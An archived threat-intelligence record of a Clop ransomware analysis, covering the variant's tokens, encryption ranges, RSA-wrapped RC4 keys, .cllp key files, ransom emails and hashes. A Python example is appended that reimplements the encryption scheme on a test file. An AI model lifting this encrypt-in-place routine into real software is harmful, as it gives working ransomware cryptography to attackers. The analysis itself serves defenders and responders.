{
	"id": "5aeb702f-a4bc-4998-a876-58d148f0f16e",
	"created_at": "2026-04-06T00:11:06.894735Z",
	"updated_at": "2026-04-10T03:20:30.666037Z",
	"deleted_at": null,
	"sha1_hash": "05c5d45f5494dadcbdb1827a68e99ea05205b799",
	"title": "[S2W LAB] Analysis of Clop Ransomware suspiciously related to the Recent Incident (English)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2752428,
	"plain_text": "[S2W LAB] Analysis of Clop Ransomware suspiciously related to the Recent Incident (English)\r\nArchived: 2026-04-05 18:44:14 UTC\r\nAuthor: TALON (BLKSMTH, HOTSAUCE)\r\nThe Clop ransomware has hit the network of a conglomerate and retail giant in South Korea, which suspended nearly half of its stores because of the attack. We have analyzed the ransomware related to the incident; a summary of the analysis follows.\r\nThis new variant of Clop generates a separate key file and stores the encryption key for each encrypted file, as opposed to the previous behaviour of changing the file content and extension and saving the encryption key at the final stage.\r\nKey File Extension : .cllp\r\nKey File Header : Cllp^_-\r\nRansom Note: The contact email addresses used in the ransom note are identical to the addresses used by Clop on their Dark Web site, where corporate data is leaked when negotiations fail.\r\nhttps://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e\r\nPage 1 of 12\r\nWe have also found the same variant of the ransomware, carrying identical signatures, on VirusTotal (build time: Nov-21-2020).\r\nWe have not yet finalized the deployment pattern, but the intrusion technique can be assumed from previous incidents:\r\nNetwork intrusion using an SMB exploit.\r\nMass deployment through a compromised Active Directory administrator account.\r\nMalicious document files distributed as attachments in spear-phishing emails.\r\nMD5 : 8b6c413e2539823ef8f8b85900d19724\r\nSHA-1 : 2d92a9ec1091cb801ff86403374594c74210cd44\r\nSHA-256 : 3d94c4a92382c5c45062d8ea0517be4011be8ba42e9c9a614a99327d0ebdf05b\r\nType : Win32 EXE (PE32 executable for MS Windows (GUI) Intel 80386 32-bit)\r\nBuild Time : 2020-11-20 18:18:18\r\nThe payload is unpacked into memory allocated with VirtualAlloc and executed from there, so the structure of the malicious code cannot be read from the file on disk.\r\nSelf-deletion is carried out by a generated ex.bat file.\r\nMD5 : 14B7069B25B04EBA875F264BE4F140DA\r\nBuild Time : 2020-11-20 14:35:08\r\nRuns and registers itself as a service\r\nService name : WinCheckDRVs\r\nUses a mutex to check whether another instance is already running (duplicate-execution check)\r\nMutex name : GKLJHWRnjktn32uyhrjn23io#666\r\nEnumerates remote shared folders and attempts to encrypt them\r\nObtains the token of EXPLORER.EXE\r\nCollects the primary access token of the user logged on to the active RDP session\r\nCollects the RDP session token of the same account as the username from the collected EXPLORER.EXE token\r\nCollects the token of the active session if the username is 5 or less\r\nExecutes itself on winsta0\\default with \"runrun\" as a parameter\r\nEnumerates remote shared folders and attempts to encrypt them\r\nRuns an event log deletion command\r\n[embedded PowerShell code block not captured]\r\nAttempts to encrypt every drive letter from A to Z, except floppy disk and CD-ROM drives.\r\nThe new version of Clop attempts to encrypt files that are in use by forcing the owning application or service to restart via the Restart Manager API.\r\nRSA public key hard-coded inside the malware.\r\n[embedded code block not captured]\r\nSkips the Desktop path when encrypting files\r\nAvoids certain files by matching a hash of the file name\r\nClop skips files with the following extensions:\r\n.CI0P : extension of files encrypted by previous versions\r\n.OCX : Object Linking and Embedding (ActiveX) control\r\n.DLL : compiled dynamic-link library\r\n.INI : initialization file\r\n.CHM : compiled HTML help file\r\n.LNG : language pack file\r\n.CLLP : key file written by the current version\r\nThe encryption technique varies with the size of the target file:\r\nsizeof(TargetFile) < 17KB : skipped, not encrypted\r\n17KB <= sizeof(TargetFile) < 2.13MB : encrypts from offset 0x4000 to EOF (end of file), using ordinary file input/output\r\n2.13MB <= sizeof(TargetFile) : encrypts only the range 0x10000 to 0x2089D0, using a memory-mapped file (MMF) to handle large files efficiently\r\nMMF : a memory-mapped file maps the contents of a file into the virtual address space so that an application can read and write the file directly through memory.\r\nA diagram of the encryption method used by Clop ransomware\r\nCreates a 117-byte key by randomly picking from the 256-byte table below (the Mersenne Twister algorithm is used to generate the random numbers)\r\n[embedded table not captured]\r\nA default 117-byte key is used when key generation fails\r\n[embedded default key not captured]\r\nThe 117-byte key is used as the RC4 key to encrypt the original data; the encrypted data is then written back over the original file rather than writing a new file and deleting the original.\r\nA key storage file, [encryption target file name].cllp, is created to manage the encryption key of each file\r\nKey File Header : Cllp^_- -> 7 bytes\r\nKey File Data : the 117-byte RC4 key encrypted with the RSA public key -> 128 bytes (the size of a 1024-bit RSA modulus; 117 bytes is exactly the largest plaintext that PKCS#1 v1.5 padding allows for that modulus size, which fits the chosen key length)\r\nEnumerates shared folders and attempts to encrypt them\r\nThe same encryption scheme is applied to those files afterwards\r\nAttempts to encrypt files starting from the C drive\r\nA ransom note is dropped in every folder in which files are encrypted\r\nRansom note file name : README_README.txt\r\nThe ransom note is created by the following procedure:\r\nExtract the encoded data from the resource section of the malicious code\r\nResource ID : 39339, Resource NAME : ID_HTML\r\nRecover the original data by XOR-decoding the resource data with the table below\r\n[embedded table not captured]\r\nUnlike previous versions, it does not delete Volume Shadow Copies\r\nWhen the command line parameter is temp.dat:\r\nReads temp.dat on execution and attempts to encrypt only the paths specified in it\r\nThe function exists, but this option is not reached from the code that actually runs\r\ndinoriuss1973@tutanota[.]com\r\nunlock@support-box[.]com\r\nunlock@support-iron[.]com\r\nThe contact (e-mail address) information is identical to that on the Dark Web site that lists Clop ransomware victims (the leaks website).\r\nNumber of Clop ransomware victims on the Dark Web: 17\r\nData upload cycle for a negotiated firm: approximately 7 days to 1 month\r\nAccounting related information\r\nMD5 list of other malware similar to the recent sample: 11 malware MD5s sharing identical signature information\r\n[embedded list not captured]\r\nMD5 : 8fc09cb1540a6dea87a078b92c8f2b0a\r\nSHA-1 : 16f48624ea2a575e1bdceb4ac6151d97d4de80b6\r\nSHA-256 : 389e03b1a1fd1c527d48df74d3c26a0483a5b105f36841193172f1ee80e62c1b\r\nBuild Time : 2020-11-21 15:56:31\r\nConfirmed that this malware was built more recently than #01 Clop Ransomware (8b6c413e2539823ef8f8b85900d19724)\r\nSame method of loading the malicious payload as #01 Clop Ransomware (8b6c413e2539823ef8f8b85900d19724)\r\nMD5 : AC0FE3E86F9FC7E5FD08D9E618B601F3\r\nSHA-1 : 8C7173BDDE2919B524B22EA257A80360DF33A333\r\nSHA-256 : 71DB30A0174795E9387F6A6CCA940359028CAD3BC3B7BEF24B48E150102DB391\r\nBuild Time : 2020-11-21 14:43:58\r\nSource: https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e"
	],
	"report_names": [
		"S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e"
	],
	"threat_actors": [],
	"ts_created_at": 1775434266,
	"ts_updated_at": 1775791230,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/05c5d45f5494dadcbdb1827a68e99ea05205b799.pdf",
		"text": "https://archive.orkl.eu/05c5d45f5494dadcbdb1827a68e99ea05205b799.txt",
		"img": "https://archive.orkl.eu/05c5d45f5494dadcbdb1827a68e99ea05205b799.jpg"
	}
}
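The per-file encryption scheme that the report's plain_text describes (size-dependent encrypted ranges, a 117-byte RC4 key drawn from a 256-byte table with a Mersenne Twister PRNG, that key wrapped with a hard-coded RSA public key into a 7 + 128 = 135-byte `.cllp` key file beside each encrypted file), modelled end to end as an added example written for this page. It is not S2W's tooling and not code from the sample. Several things are assumptions, labelled in the code: the report's 256-byte table and hard-coded public key were not captured, so `KEY_TABLE` is a stand-in and `rsa_keypair` generates a throwaway 1024-bit pair at run time with a textbook Miller-Rabin routine; the report's 2.13MB threshold is read as the offset 0x2089D0 it quotes; the report gives both "17KB" and "1.7KB" for the small-file cut-off and the example uses 17KB, which is consistent with encryption starting at offset 0x4000 (16KB); and PKCS#1 v1.5 type-2 padding is used because 117 = 128 - 11 is exactly that scheme's maximum payload for a 1024-bit modulus. `run_sample` builds a constructed file of a given size, encrypts it, records which bytes survived, and decrypts it the way a decryptor holding the private key would.

```python
import os, random, tempfile
from pathlib import Path

KEY_FILE_HEADER = b"Cllp^_-"   # 7-byte .cllp header (report)
RSA_BYTES = 128                # report: wrapped key is 128 bytes, i.e. a 1024-bit modulus
SMALL_LIMIT = 17 * 1024        # report: files under 17KB are skipped
LARGE_LIMIT = 0x2089D0         # assumption: the report's 2.13MB threshold read as this offset
KEY_TABLE = bytes(range(256))  # assumption: stand-in for the report's uncaptured 256-byte table

def encrypted_range(size):
    """[start, end) that gets RC4-encrypted for a file of `size` bytes; None if the file is skipped."""
    if size < SMALL_LIMIT:
        return None
    return (0x4000, size) if size < LARGE_LIMIT else (0x10000, 0x2089D0)

def generate_rc4_key(seed=None):
    """117 table picks driven by random.Random, which is MT19937, the PRNG the report names."""
    rng = random.Random(seed)
    return bytes(KEY_TABLE[rng.randrange(256)] for _ in range(117))

def rc4(key, data):
    """Plain RC4 (KSA + PRGA); encrypting and decrypting are the same operation."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def is_probable_prime(n, rounds=16):
    """Miller-Rabin, used only to build a demo key pair standing in for the sample's hard-coded key."""
    if n < 4:
        return n in (2, 3)
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x == 1:
            continue
        for _ in range(r):          # one of x, x^2, x^4, ... must be n-1 if n is prime
            if x == n - 1:
                break
            x = pow(x, 2, n)
        else:
            return False
    return True

def rsa_keypair(bits=RSA_BYTES * 8, e=65537):
    """Return ((n, e), (n, d)) with an exactly `bits`-long modulus."""
    def prime(b, c=4):
        while not is_probable_prime(c):
            c = random.getrandbits(b) | 1 << (b - 1) | 1
        return c
    while True:
        p, q = prime(bits // 2), prime(bits // 2)
        if p != q and (p * q).bit_length() == bits and (p - 1) % e and (q - 1) % e:
            return (p * q, e), (p * q, pow(e, -1, (p - 1) * (q - 1)))

def rsa_wrap(pub, key):
    """PKCS#1 v1.5 type 2: 128 - 3 - 117 leaves 8 padding bytes, the minimum the standard allows."""
    pad = bytes(random.randrange(1, 256) for _ in range(RSA_BYTES - 3 - len(key)))
    block = int.from_bytes(b"\x00\x02" + pad + b"\x00" + key, "big")
    return pow(block, pub[1], pub[0]).to_bytes(RSA_BYTES, "big")

def rsa_unwrap(priv, blob):
    """Inverse of rsa_wrap; only the holder of the private exponent (the actor) can do this."""
    block = pow(int.from_bytes(blob, "big"), priv[1], priv[0]).to_bytes(RSA_BYTES, "big")
    if block[:2] != b"\x00\x02":
        raise ValueError("bad PKCS#1 v1.5 block")
    return block[block.index(b"\x00", 2) + 1:]

def rc4_in_place(path, rc4_key):
    """RC4 the size-dependent range of `path` in place (report: overwrite, never delete)."""
    rng = encrypted_range(os.path.getsize(path))
    if rng is not None:
        with open(path, "r+b") as f:
            f.seek(rng[0]); chunk = f.read(rng[1] - rng[0])
            f.seek(rng[0]); f.write(rc4(rc4_key, chunk))
    return rng

def encrypt_file(path, pub):
    """Encrypt in place and drop `<path>.cllp` holding the RSA-wrapped per-file key."""
    rc4_key = generate_rc4_key()
    rng = rc4_in_place(path, rc4_key)
    if rng is not None:
        Path(path + ".cllp").write_bytes(KEY_FILE_HEADER + rsa_wrap(pub, rc4_key))
    return rng

def decrypt_file(path, priv):
    """What a decryptor must do: check the .cllp layout (7 + 128 = 135 bytes), unwrap, RC4 again."""
    blob = Path(path + ".cllp").read_bytes()
    if not blob.startswith(KEY_FILE_HEADER) or len(blob) != len(KEY_FILE_HEADER) + RSA_BYTES:
        raise ValueError("not a .cllp key file: " + path)
    return rc4_in_place(path, rsa_unwrap(priv, blob[len(KEY_FILE_HEADER):]))

def run_sample(size, pub, priv):
    """Encrypt one constructed file of `size` bytes, record what survived, then decrypt it."""
    path = os.path.join(tempfile.mkdtemp(), "sample.bin")
    original = bytes(range(256)) * (size // 256)   # constructed content, a multiple of 256 bytes
    Path(path).write_bytes(original)
    rng = encrypt_file(path, pub)
    data, key_file = Path(path).read_bytes(), Path(path + ".cllp")
    start, end = rng or (size, size)               # a skipped file is all untouched "head"
    facts = {"range": rng, "key_file_bytes": key_file.stat().st_size if key_file.exists() else 0,
             "head_intact": data[:start] == original[:start], "tail_intact": data[end:] == original[end:],
             "body_changed": data[start:end] != original[start:end]}
    if rng is not None:
        decrypt_file(path, priv)
        facts["restored"] = Path(path).read_bytes() == original
    return facts
```

Calling `run_sample` with 4096, 200 * 1024 and 3 << 20 bytes against one key pair from `rsa_keypair()` shows the three cases the report distinguishes: the 4KB file is untouched and gets no key file; the 200KB file keeps its first 16KB (0x4000) in clear, so file-type headers survive, and gets a 135-byte key file; the 3MB file keeps its first 64KB and everything past 0x2089D0 in clear. In each encrypted case the file is only restored after `rsa_unwrap` with the private exponent recovers the per-file RC4 key, which is why the key files alone are of no use to a responder without the actor's private key.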